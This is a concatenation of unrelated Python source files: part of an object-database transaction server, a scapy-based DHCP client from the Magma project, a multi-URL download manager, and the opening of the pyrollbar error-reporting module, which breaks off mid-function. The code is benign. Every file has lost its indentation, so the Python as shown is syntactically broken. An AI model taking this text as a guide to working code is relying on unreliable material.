for ident in identities:
res[keymapping.data_reverse_index_key(schemaname, typename, ident, fieldname)] = None
for indexKey, identities in adds.items():
schemaname, typename, fieldname, valuehash = keymapping.split_index_key_full(indexKey)
for ident in identities:
res[keymapping.data_reverse_index_key(schemaname, typename, ident, fieldname)] = valuehash
return res
def _broadcastSubscriptionIncrease(self, channel, indexKey, newIds):
newIds = list(newIds)
schema_name, typename, fieldname, fieldval = keymapping.split_index_key_full(indexKey)
channel.channel.write(
ServerToClient.SubscriptionIncrease(
schema=schema_name,
typename=typename,
fieldname_and_value=(fieldname, fieldval),
identities=newIds
)
)
def _loadValuesForObject(self, channel, schema_name, typename, identities):
typedef = channel.definedSchemas.get(schema_name)[typename]
valsToGet = []
for field_to_pull in typedef.fields:
for ident in identities:
valsToGet.append(keymapping.data_key_from_names(schema_name, typename, ident, field_to_pull))
results = self._kvstore.getSeveral(valsToGet)
return {valsToGet[i]: results[i] for i in range(len(valsToGet))}
def _increaseBroadcastTransactionToInclude(self, channel, indexKey, newIds, key_value, set_adds, set_removes):
# we need to include all the data for the objects in 'newIds' to the transaction
# that we're broadcasting
schema_name, typename, fieldname, fieldval = keymapping.split_index_key_full(indexKey)
typedef = channel.definedSchemas.get(schema_name)[typename]
key_value.update(self._loadValuesForObject(channel, schema_name, typename, newIds))
reverseKeys = []
for index_name in typedef.indices:
for ident in newIds:
reverseKeys.append(keymapping.data_reverse_index_key(schema_name, typename, ident, index_name))
reverseVals = self._kvstore.getSeveral(reverseKeys)
reverseKVMap = {reverseKeys[i]: reverseVals[i] for i in range(len(reverseKeys))}
for index_name in typedef.indices:
for ident in newIds:
fieldval = reverseKVMap.get(keymapping.data_reverse_index_key(schema_name, typename, ident, index_name))
if fieldval is not None:
ik = keymapping.index_key_from_names_encoded(schema_name, typename, index_name, fieldval)
set_adds.setdefault(ik, set()).add(ident)
def _loadLazyObject(self, channel, msg):
channel.channel.write(
ServerToClient.LazyLoadResponse(
identity=msg.identity,
values=self._loadValuesForObject(channel, msg.schema, msg.typename, [msg.identity])
)
)
def _garbage_collect(self, intervalOverride=None):
"""Cleanup anything in '_version_numbers' where we have deleted the entry
and it's inactive for a long time."""
interval = intervalOverride or self._gc_interval
if self._last_garbage_collect_timestamp is None or time.time() - self._last_garbage_collect_timestamp > interval:
threshold = time.time() - interval
new_ts = {}
for key, ts in self._version_numbers_timestamps.items():
if ts < threshold:
if keymapping.isIndexKey(key):
if not self._kvstore.getSetMembers(key):
del self._version_numbers[key]
else:
if self._kvstore.get(key) is None:
del self._version_numbers[key]
else:
new_ts[key] = ts
self._version_numbers_timestamps = new_ts
self._last_garbage_collect_timestamp = time.time()
def _handleNewTransaction(self,
sourceChannel,
key_value,
set_adds,
set_removes,
keys_to_check_versions,
indices_to_check_versions,
as_of_version
):
"""Commit a transaction.
key_value: a map
db_key -> (json_representation, database_representation)
that we want to commit. We cache the normal_representation for later.
set_adds: a map:
db_key -> set of identities added to an index
set_removes: a map:
db_key -> set of identities removed from an index
"""
self._cur_transaction_num += 1
transaction_id = self._cur_transaction_num
assert transaction_id > as_of_version
t0 = time.time()
set_adds = {k: v for k, v in set_adds.items() if v}
set_removes = {k: v for k, v in set_removes.items() if v}
identities_mentioned = set()
keysWritingTo = set()
setsWritingTo = set()
schemaTypePairsWriting = set()
if sourceChannel:
# check if we created any new objects to which we are not type-subscribed
# and if so, ensure we are subscribed
for add_index, added_identities in set_adds.items():
schema_name, typename, fieldname, fieldval = keymapping.split_index_key_full(add_index)
if fieldname == ' exists':
if (schema_name, typename) not in sourceChannel.subscribedTypes:
sourceChannel.subscribedIds.update(added_identities)
for new_id in added_identities:
self._id_to_channel.setdefault(new_id, set()).add(sourceChannel)
self._broadcastSubscriptionIncrease(sourceChannel, add_index, added_identities)
for key in key_value:
keysWritingTo.add(key)
schema_name, typename, ident = keymapping.split_data_key(key)[:3]
schemaTypePairsWriting.add((schema_name, typename))
identities_mentioned.add(ident)
for subset in [set_adds, set_removes]:
for k in subset:
if subset[k]:
schema_name, typename = keymapping.split_index_key(k)[:2]
schemaTypePairsWriting.add((schema_name, typename))
setsWritingTo.add(k)
identities_mentioned.update(subset[k])
# check all version numbers for transaction conflicts.
for subset in [keys_to_check_versions, indices_to_check_versions]:
for key in subset:
last_tid = self._version_numbers.get(key, -1)
if as_of_version < last_tid:
return (False, key)
t1 = time.time()
for key in keysWritingTo:
self._version_numbers[key] = transaction_id
self._version_numbers_timestamps[key] = t1
for key in setsWritingTo:
self._version_numbers[key] = transaction_id
self._version_numbers_timestamps[key] = t1
priorValues = self._kvstore.getSeveralAsDictionary(key_value)
# set the json representation in the database
target_kvs = {k: v for k, v in key_value.items()}
target_kvs.update(self.indexReverseLookupKvs(set_adds, set_removes))
new_sets, dropped_sets = self._kvstore.setSeveral(target_kvs, set_adds, set_removes)
# update the metadata index
indexSetAdds = {}
indexSetRemoves = {}
for s in new_sets:
index_key, index_val = keymapping.split_index_key(s)
if index_key not in indexSetAdds:
indexSetAdds[index_key] = set()
indexSetAdds[index_key].add(index_val)
for s in dropped_sets:
index_key, index_val = keymapping.split_index_key(s)
if index_key not in indexSetRemoves:
indexSetRemoves[index_key] = set()
indexSetRemoves[index_key].add(index_val)
self._kvstore.setSeveral({}, indexSetAdds, indexSetRemoves)
t2 = time.time()
channelsTriggeredForPriors = set()
# check any index-level subscriptions that are going to increase as a result of this
# transaction and add the backing data to the relevant transaction.
for index_key, adds in list(set_adds.items()):
if index_key in self._index_to_channel:
idsToAddToTransaction = set()
for channel in self._index_to_channel.get(index_key):
if index_key in channel.subscribedIndexKeys and \
channel.subscribedIndexKeys[index_key] >= 0:
# this is a lazy subscription. We're not using the transaction ID yet because
# we don't store it on a per-object basis here. Instead, we're always sending
# everything twice to lazy subscribers.
channelsTriggeredForPriors.add(channel)
newIds = adds.difference(channel.subscribedIds)
for new_id in newIds:
self._id_to_channel.setdefault(new_id, set()).add(channel)
channel.subscribedIds.add(new_id)
self._broadcastSubscriptionIncrease(channel, index_key, newIds)
idsToAddToTransaction.update(newIds)
if idsToAddToTransaction:
self._increaseBroadcastTransactionToInclude(
channel, # deliberately just using whatever random channel, under
# the assumption they're all the same. it would be better
# to explictly compute the union of the relevant set of
# defined fields, as its possible one channel has more fields
# for a type than another and we'd like to broadcast them all
index_key, idsToAddToTransaction, key_value, set_adds, set_removes)
transaction_message = None
channelsTriggered = set()
for schema_type_pair in schemaTypePairsWriting:
for channel in self._type_to_channel.get(schema_type_pair, ()):
if channel.subscribedTypes[schema_type_pair] >= 0:
# this is a lazy subscription. We're not using the transaction ID yet because
# we don't store it on a per-object basis here. Instead, we're always sending
# everything twice to lazy subscribers.
channelsTriggeredForPriors.add(channel)
channelsTriggered.add(channel)
for i in identities_mentioned:
if i in self._id_to_channel:
channelsTriggered.update(self._id_to_channel[i])
for channel in channelsTriggeredForPriors:
lazy_message = ServerToClient.LazyTransactionPriors(writes=priorValues) # noqa
transaction_message = ServerToClient.Transaction(
writes={k: v for k, v in key_value.items()},
set_adds=set_adds,
set_removes=set_removes,
transaction_id=transaction_id
)
if self._pendingSubscriptionRecheck is not None:
self._pendingSubscriptionRecheck.append(transaction_message)
for channel in channelsTriggered:
channel.sendTransaction(transaction_message)
if self.verbose or time.time() - t0 > self.longTransactionThreshold:
self._logger.info(
"Transaction [%.2f/%.2f/%.2f] with %s writes, %s set ops: %s",
t1 - t0, t2 - t1, time.time() - t2,
len(key_value), len(set_adds) + len(set_removes), sorted(key_value)[:3]
)
self._garbage_collect()
return (True, None)
|
dhcp_client.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Allocates IP address as per DHCP server in the uplink network.
"""
import datetime
import logging
import threading
import time
from typing import Optional, MutableMapping
from ipaddress import IPv4Network, ip_address
from scapy.all import AsyncSniffer
from scapy.layers.dhcp import BOOTP, DHCP
from scapy.layers.l2 import Ether, Dot1Q
from scapy.layers.inet import IP, UDP
from scapy.sendrecv import sendp
from threading import Condition
from magma.mobilityd.mac import MacAddress, hex_to_mac
from magma.mobilityd.dhcp_desc import DHCPState, DHCPDescriptor
from magma.mobilityd.uplink_gw import UplinkGatewayInfo
LOG = logging.getLogger('mobilityd.dhcp.sniff')
DHCP_ACTIVE_STATES = [DHCPState.ACK, DHCPState.OFFER]
class DHCPClient:
THREAD_YIELD_TIME = .1
def __init__(self,
dhcp_store: MutableMapping[str, DHCPDescriptor],
gw_info: UplinkGatewayInfo,
dhcp_wait: Condition,
iface: str = "dhcp0",
lease_renew_wait_min: int = 200):
"""
Implement DHCP client to allocate IP for given Mac address.
DHCP client state is maintained in user provided hash table.
Args:
dhcp_store: maintain DHCP transactions, key is mac address.
gw_info_map: stores GW IP info from DHCP server
dhcp_wait: notify users on new DHCP packet
iface: DHCP egress and ingress interface.
"""
self._sniffer = AsyncSniffer(iface=iface,
filter="udp and (port 67 or 68)",
prn=self._rx_dhcp_pkt)
self.dhcp_client_state = dhcp_store # mac => DHCP_State
self.dhcp_gw_info = gw_info
self._dhcp_notify = dhcp_wait
self._dhcp_interface = iface
self._msg_xid = 0
self._lease_renew_wait_min = lease_renew_wait_min
self._monitor_thread = threading.Thread(target=self._monitor_dhcp_state)
self._monitor_thread.daemon = True
self._monitor_thread_event = threading.Event()
def run(self):
"""
Start DHCP sniffer thread.
This initializes state required for DHCP sniffer thread anf starts it.
Returns: None
"""
self._sniffer.start()
LOG.info("DHCP sniffer started")
# give it time to schedule the thread and start sniffing.
time.sleep(self.THREAD_YIELD_TIME)
self._monitor_thread.start()
def stop(self):
self._sniffer.stop()
self._monitor_thread_event.set()
def send_dhcp_packet(self, mac: MacAddress, vlan: str,
state: DHCPState,
dhcp_desc: DHCPDescriptor = None):
"""
Send DHCP packet and record state in dhcp_client_state.
Args:
mac: MAC address of interface
state: state of DHCP packet
dhcp_desc: DHCP protocol state.
Returns:
"""
ciaddr = None
# generate DHCP request packet
if state == DHCPState.DISCOVER:
dhcp_opts = [("message-type", "discover")]
dhcp_desc = DHCPDescriptor(mac=mac, ip="", vlan=vlan,
state_requested=DHCPState.DISCOVER)
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
elif state == DHCPState.REQUEST:
dhcp_opts = [("message-type", "request"),
("requested_addr", dhcp_desc.ip),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.REQUEST
pkt_xid = dhcp_desc.xid
ciaddr = dhcp_desc.ip
elif state == DHCPState.RELEASE:
dhcp_opts = [("message-type", "release"),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.RELEASE
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
ciaddr = dhcp_desc.ip
else:
LOG.warning("Unknown egress request mac %s state %s", str(mac), state)
return
dhcp_opts.append("end")
dhcp_desc.xid = pkt_xid
with self._dhcp_notify:
self.dhcp_client_state[mac.as_redis_key(vlan)] = dhcp_desc
pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff")
if vlan and vlan != "0":
pkt /= Dot1Q(vlan=int(vlan))
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr)
pkt /= DHCP(options=dhcp_opts)
LOG.debug("DHCP pkt xmit %s", pkt.show(dump=True))
sendp(pkt, iface=self._dhcp_interface, verbose=0)
def get_dhcp_desc(self, mac: MacAddress, vlan: str) -> Optional[DHCPDescriptor]:
"""
Get DHCP description for given MAC.
Args:
mac: Mac address of the client
vlan: vlan id if the IP allocated in a VLAN
Returns: Current DHCP info.
"""
key = mac.as_redis_key(vlan)
if key in self.dhcp_client_state:
return self.dhcp_client_state[key]
LOG.debug("lookup error for %s", str(key))
return None
def release_ip_address(self, mac: MacAddress, vlan: str):
"""
Release DHCP allocated IP.
Args:
mac: MAC address of the IP allocated.
vlan: vlan id if the IP allocated in a VLAN
Returns: None
"""
key = mac.as_redis_key(vlan)
if key not in self.dhcp_client_state:
LOG.error("Unallocated DHCP release for MAC: %s", key)
return
dhcp_desc = self.dhcp_client_state[key]
self.send_dhcp_packet(mac, dhcp_desc.vlan, DHCPState.RELEASE, dhcp_desc)
def _monitor_dhcp_state(self):
"""
monitor DHCP client state.
"""
while True:
wait_time = self._lease_renew_wait_min
with self._dhcp_notify:
for dhcp_record in self.dhcp_client_state.values():
logging.debug("monitor: %s", dhcp_record)
# Only process active records.
if dhcp_record.state not in DHCP_ACTIVE_STATES:
continue
now = datetime.datetime.now()
logging.debug("monitor time: %s", now)
request_state = DHCPState.REQUEST
# in case of lost DHCP lease rediscover it.
if now >= dhcp_record.lease_expiration_time:
request_state = DHCPState.DISCOVER
if now >= dhcp_record.lease_renew_deadline:
logging.debug("sending lease renewal")
self.send_dhcp_packet(dhcp_record.mac, dhcp_record.vlan,
request_state, dhcp_record)
else:
# Find next renewal wait time.
time_to_renew = dhcp_record.lease_renew_deadline - now
wait_time = min(wait_time, time_to_renew.total_seconds())
# default in wait is 30 sec
wait_time = max(wait_time, self._lease_renew_wait_min)
logging.debug("lease renewal check after: %s sec" % wait_time)
self._monitor_thread_event.wait(wait_time)
if self._monitor_thread_event.is_set():
break
@staticmethod
def _get_option(packet, name):
for opt in packet[DHCP].options:
if opt[0] == name:
return opt[1]
return None
def _process_dhcp_pkt(self, packet, state: DHCPState):
LOG.debug("DHCP pkt recv %s", packet.show(dump=True))
mac_addr = MacAddress(hex_to_mac(packet[BOOTP].chaddr.hex()[0:12]))
vlan = ""
if Dot1Q in packet:
vlan = str(packet[Dot1Q].vlan)
mac_addr_key = mac_addr.as_redis_key(vlan)
with self._dhcp_notify:
if mac_addr_key in self.dhcp_client_state:
state_requested = self.dhcp_client_state[mac_addr_key].state_requested
ip_offered = packet[BOOTP].yiaddr
subnet_mask = self._get_option(packet, "subnet_mask")
if subnet_mask is not None:
ip_subnet = IPv4Network(ip_offered + "/" + subnet_mask, strict=False)
else:
ip_subnet = IPv4Network(ip_offered + "/" + "32", strict=False)
dhcp_router_opt = self._get_option(packet, "router")
if dhcp_router_opt is not None:
router_ip_addr = ip_address(dhcp_router_opt)
else:
router_ip_addr = None
lease_expiration_time = self._get_option(packet, "lease_time")
dhcp_state = DHCPDescriptor(mac=mac_addr,
ip=ip_offered,
state=state,
vlan=vlan,
state_requested=state_requested,
subnet=str(ip_subnet),
server_ip=packet[IP].src,
router_ip=router_ip_addr,
lease_expiration_time=lease_expiration_time,
xid=packet[BOOTP].xid)
LOG.info("Record DHCP for: %s state: %s", mac_addr_key, dhcp_state)
self.dhcp_client_state[mac_addr_key] = dhcp_state
self.dhcp_gw_info.update_ip(router_ip_addr, vlan)
self._dhcp_notify.notifyAll()
if state == DHCPState.OFFER:
# let other thread work on fulfilling IP allocation request.
threading.Event().wait(self.THREAD_YIELD_TIME)
self.send_dhcp_packet(mac_addr, vlan, DHCPState.REQUEST, dhcp_state)
else:
LOG.debug("Unknown MAC: %s " % packet.summary())
return
# ref: https://fossies.org/linux/scapy/scapy/layers/dhcp.py
def _rx_dhcp_pkt(self, packet):
if DHCP not in packet:
return
# Match DHCP offer
if packet[DHCP].options[0][1] == int(DHCPState.OFFER):
self._process_dhcp_pkt(packet, DHCPState.OFFER)
# Match DHCP ack
elif packet[DHCP].options[0][1] == int(DHCPState.ACK):
self._process_dhcp_pkt(packet, DHCPState.ACK)
# TODO handle other DHCP protocol events.
|
download_manager.py
|
# -*- coding: utf-8 -*-
import os
import time
from queue import Queue, Empty
from threading import Thread
from urllib.parse import urlparse
from tqdm import tqdm
from multidl.constants import DownloadState, STATE_TRANSITIONS
from multidl.downloaders import SCHEMES
from multidl.exceptions import TransitionError
class DownloadManager:
def __init__(self, urls, output_directory, nb_workers, **options):
self.output_directory = output_directory
self.nb_workers = min(nb_workers, len(urls))
self.options = options
self._urls = Queue()
self._state = DownloadState.not_started
self._download_handlers = []
# initialize the queue
for i, url in enumerate(urls):
self._urls.put((i, url))
self._download_handlers.append(DownloadHandler(url))
def log(self, *args, **kwargs):
if self.options.get('quiet'):
return
print(*args, **kwargs)
@staticmethod
def get_downloader(url):
parsed_url = urlparse(url)
for downloader in SCHEMES.get(parsed_url.scheme, []):
if downloader.can_handle_url(url):
return downloader
raise NotImplementedError('No downloader for {} urls'
.format(parsed_url.scheme))
@property
def state(self):
return self._state
@state.setter
def state(self, value):
current_state = self._state
if value not in STATE_TRANSITIONS[current_state]:
raise TransitionError(current_state, value)
self._state = value
def process(self):
self.state = DownloadState.started
try:
watcher = Thread(target=self.watcher)
watcher.start()
for _ in range(self.nb_workers):
t = Thread(target=self.worker)
t.start()
self._urls.join()
watcher.join()
except KeyboardInterrupt:
self.cancel()
def worker(self):
while True:
state = self.state
if state not in [DownloadState.paused, DownloadState.started]:
break
if state == DownloadState.paused:
time.sleep(0.1)
continue
try:
index, url = self._urls.get_nowait()
except Empty:
break
downloader = self.process_single_url(url)
if downloader:
self._download_handlers[index].downloader = downloader
downloader.start()
self._urls.task_done()
def process_single_url(self, url):
try:
downloader = self.get_downloader(url)
except NotImplementedError as e:
self.log('{}: skipping {}'.format(e, url))
return None
output = os.path.join(self.output_directory)
download_process = downloader(url, output)
return download_process
def watcher(self):
while True:
for download_handler in self._download_handlers:
download_handler.update_progress()
if not self._urls.unfinished_tasks:
break
time.sleep(1)
self.state = DownloadState.finished
tqdm.write('')
def pause(self):
self.state = DownloadState.pausing
for download_handler in self._download_handlers:
download_handler.pause()
self.state = DownloadState.paused
def resume(self):
self.state = DownloadState.resuming
for download_handler in self._download_handlers:
download_handler.resume()
self.state = DownloadState.started
def cancel(self):
self.state = DownloadState.canceling
for download_handler in self._download_handlers:
download_handler.cancel()
self.state = DownloadState.canceled
class DownloadHandler:
def __init__(self, url):
self.url = url
self.downloader = None
self.progress_bar = None
def update_progress(self):
if not self.downloader:
return
downloaded, total = self.downloader.get_progress()
if self.progress_bar is None:
bar_name = os.path.basename(self.downloader.output)
self.progress_bar = tqdm(
total=total, desc=bar_name, disable=False,
unit='b', unit_scale=True, unit_divisor=1024)
progress = downloaded - self.progress_bar.n
self.progress_bar.update(progress)
if self.downloader.state in [DownloadState.finished,
DownloadState.canceled,
DownloadState.error]:
self.progress_bar.close()
def pause(self):
self.downloader and self.downloader.pause()
def resume(self):
self.downloader and self.downloader.resume()
def cancel(self):
self.downloader and self.downloader.cancel()
|
__init__.py
|
"""
Plugin for Pyramid apps to submit errors to Rollbar
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import copy
import functools
import inspect
import json
import logging
import os
import socket
import sys
import threading
import time
import traceback
import types
import uuid
import wsgiref.util
import requests
import six
from rollbar.lib import events, filters, dict_merge, parse_qs, text, transport, urljoin, iteritems
__version__ = '0.14.5'
__log_name__ = 'rollbar'
log = logging.getLogger(__log_name__)
try:
# 2.x
import Queue as queue
except ImportError:
# 3.x
import queue
# import request objects from various frameworks, if available
try:
from webob import BaseRequest as WebobBaseRequest
except ImportError:
WebobBaseRequest = None
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
DjangoHttpRequest = None
RestFrameworkRequest = None
else:
try:
from django.http import HttpRequest as DjangoHttpRequest
except (ImportError, ImproperlyConfigured):
DjangoHttpRequest = None
try:
from rest_framework.request import Request as RestFrameworkRequest
except (ImportError, ImproperlyConfigured):
RestFrameworkRequest = None
del ImproperlyConfigured
try:
from werkzeug.wrappers import BaseRequest as WerkzeugRequest
except (ImportError, SyntaxError):
WerkzeugRequest = None
try:
from werkzeug.local import LocalProxy as WerkzeugLocalProxy
except (ImportError, SyntaxError):
WerkzeugLocalProxy = None
try:
from tornado.httpserver import HTTPRequest as TornadoRequest
except ImportError:
TornadoRequest = None
try:
from bottle import BaseRequest as BottleRequest
except ImportError:
BottleRequest = None
try:
from sanic.request import Request as SanicRequest
except ImportError:
SanicRequest = None
try:
from google.appengine.api.urlfetch import fetch as AppEngineFetch
except ImportError:
AppEngineFetch = None
def passthrough_decorator(func):
def wrap(*args, **kwargs):
return func(*args, **kwargs)
return wrap
try:
from tornado.httpclient import AsyncHTTPClient as TornadoAsyncHTTPClient
except ImportError:
TornadoAsyncHTTPClient = None
try:
import treq
from twisted.python import log as twisted_log
def log_handler(event):
"""
Default uncaught error handler
"""
try:
if not event.get('isError') or 'failure' not in event:
return
err = event['failure']
# Don't report Rollbar internal errors to ourselves
if issubclass(err.type, ApiException):
log.error('Rollbar internal error: %s', err.value)
else:
report_exc_info((err.type, err.value, err.getTracebackObject()))
except:
log.exception('Error while reporting to Rollbar')
# Add Rollbar as a log handler which will report uncaught errors
twisted_log.addObserver(log_handler)
except ImportError:
treq = None
try:
from falcon import Request as FalconRequest
except ImportError:
FalconRequest = None
def get_request():
"""
Get the current request object. Implementation varies on
library support. Modified below when we know which framework
is being used.
"""
# TODO(cory): add in a generic _get_locals_request() which
# will iterate up through the call stack and look for a variable
# that appears to be valid request object.
for fn in (_get_bottle_request,
_get_flask_request,
_get_pyramid_request,
_get_pylons_request):
try:
req = fn()
if req is not None:
return req
except:
pass
return None
def _get_bottle_request():
if BottleRequest is None:
return None
from bottle import request
return request
def _get_flask_request():
if WerkzeugRequest is None:
return None
from flask import request
return request
def _get_pyramid_request():
if WebobBaseRequest is None:
return None
from pyramid.threadlocal import get_current_request
return get_current_request()
def _get_pylons_request():
if WebobBaseRequest is None:
return None
from pylons import request
return request
BASE_DATA_HOOK = None
agent_log = None
VERSION = __version__
DEFAULT_ENDPOINT = 'https://api.rollbar.com/api/1/'
DEFAULT_TIMEOUT = 3
ANONYMIZE = 'anonymize'
DEFAULT_LOCALS_SIZES = {
'maxlevel': 5,
'maxdict': 10,
'maxlist': 10,
'maxtuple': 10,
'maxset': 10,
'maxfrozenset': 10,
'maxdeque': 10,
'maxarray': 10,
'maxstring': 100,
'maxlong': 40,
'maxother': 100,
}
# configuration settings
# configure by calling init() or overriding directly
SETTINGS = {
'access_token': None,
'enabled': True,
'environment': 'production',
'exception_level_filters': [],
'root': None, # root path to your code
'branch': None, # git branch name
'code_version': None,
'handler': 'thread', # 'blocking', 'thread', 'agent', 'tornado', 'gae' or 'twisted'
'endpoint': DEFAULT_ENDPOINT,
'timeout': DEFAULT_TIMEOUT,
'agent.log_file': 'log.rollbar',
'scrub_fields': [
'pw',
'passwd',
'password',
'secret',
'confirm_password',
'confirmPassword',
'password_confirmation',
'passwordConfirmation',
'access_token',
'accessToken',
'auth',
'authentication',
],
'url_fields': ['url', 'link', 'href'],
'notifier': {
'name': 'pyrollbar',
'version': VERSION
},
'allow_logging_basic_config': True, # set to False to avoid a call to logging.basicConfig()
'locals': {
'enabled': True,
'safe_repr': True,
'scrub_varargs': True,
'sizes': DEFAULT_LOCALS_SIZES,
'whitelisted_types': []
},
'verify_https': True,
'shortener_keys': [],
'suppress_reinit_warning': False,
'capture_email': False,
'capture_username': False,
'capture_ip': True,
'log_all_rate_limited_items': True,
'http_proxy': None,
'http_proxy_user': None,
'http_proxy_password': None,
}
_CURRENT_LAMBDA_CONTEXT = None
_LAST_RESPONSE_STATUS = None
# Set in init()
_transforms = []
_serialize_transform = None
_initialized = False
from rollbar.lib.transforms.scrub_redact import REDACT_REF
from rollbar.lib import transforms
from rollbar.lib.transforms.scrub import ScrubTransform
from rollbar.lib.transforms.scruburl import ScrubUrlTransform
from rollbar.lib.transforms.scrub_redact import ScrubRedactTransform
from rollbar.lib.transforms.serializable import SerializableTransform
from rollbar.lib.transforms.shortener import ShortenerTransform
## public api
def init(access_token, environment='production', scrub_fields=None, url_fields=None, **kw):
"""
Saves configuration variables in this module's SETTINGS.
access_token: project access token. Get this from the Rollbar UI:
- click "Settings" in the top nav
- click "Projects" in the left nav
- copy-paste the appropriate token.
environment: environment name. Can be any string; suggestions: 'production', 'development',
'staging', 'yourname'
**kw: provided keyword arguments will override keys in SETTINGS.
"""
global SETTINGS, agent_log, _initialized, _transforms, _serialize_transform, _threads
if scrub_fields is not None:
SETTINGS['scrub_fields'] = list(scrub_fields)
if url_fields is not None:
SETTINGS['url_fields'] = list(url_fields)
# Merge the extra config settings into SETTINGS
SETTINGS = dict_merge(SETTINGS, kw)
if _initialized:
# NOTE: Temp solution to not being able to re-init.
# New versions of pyrollbar will support re-initialization
# via the (not-yet-implemented) configure() method.
if not SETTINGS.get('suppress_reinit_warning'):
log.warning('Rollbar already initialized. Ignoring re-init.')
return
SETTINGS['access_token'] = access_token
SETTINGS['environment'] = environment
if SETTINGS.get('allow_logging_basic_config'):
logging.basicConfig()
if SETTINGS.get('handler') == 'agent':
agent_log = _create_agent_log()
# We will perform these transforms in order:
# 1. Serialize the payload to be all python built-in objects
# 2. Scrub the payloads based on the key suffixes in SETTINGS['scrub_fields']
# 3. Scrub URLs in the payload for keys that end with 'url'
# 4. Optional - If local variable gathering is enabled, transform the
# trace frame values using the ShortReprTransform.
_serialize_transform = SerializableTransform(safe_repr=SETTINGS['locals']['safe_repr'],
whitelist_types=SETTINGS['locals']['whitelisted_types'])
_transforms = [
ScrubRedactTransform(),
_serialize_transform,
ScrubTransform(suffixes=[(field,) for field in SETTINGS['scrub_fields']], redact_char='*'),
ScrubUrlTransform(suffixes=[(field,) for field in SETTINGS['url_fields']], params_to_scrub=SETTINGS['scrub_fields'])
]
# A list of key prefixes to apply our shortener transform to. The request
# being included in the body key is old behavior and is being retained for
# backwards compatibility.
shortener_keys = [
('request', 'POST'),
('request', 'json'),
('body', 'request', 'POST'),
('body', 'request', 'json'),
]
if SETTINGS['locals']['enabled']:
shortener_keys.append(('body', 'trace', 'frames', '*', 'code'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'args', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'kwargs', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'locals', '*'))
shortener_keys.extend(SETTINGS['shortener_keys'])
shortener = ShortenerTransform(safe_repr=SETTINGS['locals']['safe_repr'],
keys=shortener_keys,
**SETTINGS['locals']['sizes'])
_transforms.append(shortener)
_threads = queue.Queue()
events.reset()
filters.add_builtin_filters(SETTINGS)
_initialized = True
def lambda_function(f):
"""
Decorator for making error handling on AWS Lambda easier
"""
@functools.wraps(f)
def wrapper(event, context):
global _CURRENT_LAMBDA_CONTEXT
_CURRENT_LAMBDA_CONTEXT = context
try:
result = f(event, context)
return wait(lambda: result)
except:
cls, exc, trace = sys.exc_info()
report_exc_info((cls, exc, trace.tb_next))
wait()
raise
return wrapper
def report_exc_info(exc_info=None, request=None, extra_data=None, payload_data=None, level=None, **kw):
"""
Reports an exception to Rollbar, using exc_info (from calling sys.exc_info())
exc_info: optional, should be the result of calling sys.exc_info(). If omitted, sys.exc_info() will be called here.
request: optional, a WebOb, Werkzeug-based or Sanic request object.
extra_data: optional, will be included in the 'custom' section of the payload
payload_data: optional, dict that will override values in the final payload
(e.g. 'level' or 'fingerprint')
kw: provided for legacy purposes; unused.
Example usage:
rollbar.init(access_token='YOUR_PROJECT_ACCESS_TOKEN')
try:
do_something()
except:
rollbar.report_exc_info(sys.exc_info(), request, {'foo': 'bar'}, {'level': 'warning'})
"""
if exc_info is None:
exc_info = sys.exc_info()
try:
return _report_exc_info(exc_info, request, extra_data, payload_data, level=level)
except Exception as e:
log.exception("Exception while reporting exc_info to Rollbar. %r", e)
def report_message(message, level='error', request=None, extra_data=None, payload_data=None):
"""
Reports an arbitrary string message to Rollbar.
message: the string body of the message
level: level to report at. One of: 'critical', 'error', 'warning', 'info', 'debug'
request: the request object for the context of the message
extra_data: dictionary of params to include with the message. 'body' is reserved.
payload_data: param names to pass in the 'data' level of the payload; overrides defaults.
"""
try:
return _report_message(message, level, request, extra_data, payload_data)
except Exception as e:
log.exception("Exception while reporting message to Rollbar. %r", e)
def send_payload(payload, access_token):
"""
Sends a payload object, (the result of calling _build_payload() + _serialize_payload()).
Uses the configured handler from SETTINGS['handler']
Available handlers:
- 'blocking': calls _send_payload() (which makes an HTTP request) immediately, blocks on it
- 'thread': starts a single-use thread that will call _send_payload(). returns immediately.
- 'agent': writes to a log file to be processed by rollbar-agent
- 'tornado': calls _send_payload_tornado() (which makes an async HTTP request using tornado's AsyncHTTPClient)
- 'gae': calls _send_payload_appengine() (which makes a blocking call to Google App Engine)
- 'twisted': calls _send_payload_twisted() (which makes an async HTTP reqeust using Twisted and Treq)
"""
payload = events.on_payload(payload)
if payload is False:
return
payload_str = _serialize_payload(payload)
handler = SETTINGS.get('handler')
if handler == 'blocking':
_send_payload(payload_str, access_token)
elif handler == 'agent':
agent_log.error(payload_str)
elif handler == 'tornado':
if TornadoAsyncHTTPClient is None:
log.error('Unable to find tornado')
return
_send_payload_tornado(payload_str, access_token)
elif handler == 'gae':
if AppEngineFetch is None:
log.error('Unable to find AppEngine URLFetch module')
return
_send_payload_appengine(payload_str, access_token)
elif handler == 'twisted':
if treq is None:
log.error('Unable to find Treq')
return
_send_payload_twisted(payload_str, access_token)
else:
# default to 'thread'
thread = threading.Thread(target=_send_payload, args=(payload_str, access_token))
_threads.put(thread)
thread.start()
def search_items(title, return_fields=None, access_token=None, endpoint=None, **search_fields):
"""
Searches a project for items that match the input criteria.
title: all or part of the item's title to search for.
return_fields: the fields that should be returned for each item.
e.g. ['id', 'project_id', 'status'] will return a dict containing
only those fields for each item.
access_token: a project access token. If this is not provided,
the one provided to init() will be used instead.
search_fields: additional fields to include in the search.
currently supported: status, level, environment
"""
if not title:
return []
if return_fields is not None:
return_fields = ','.join(return_fields)
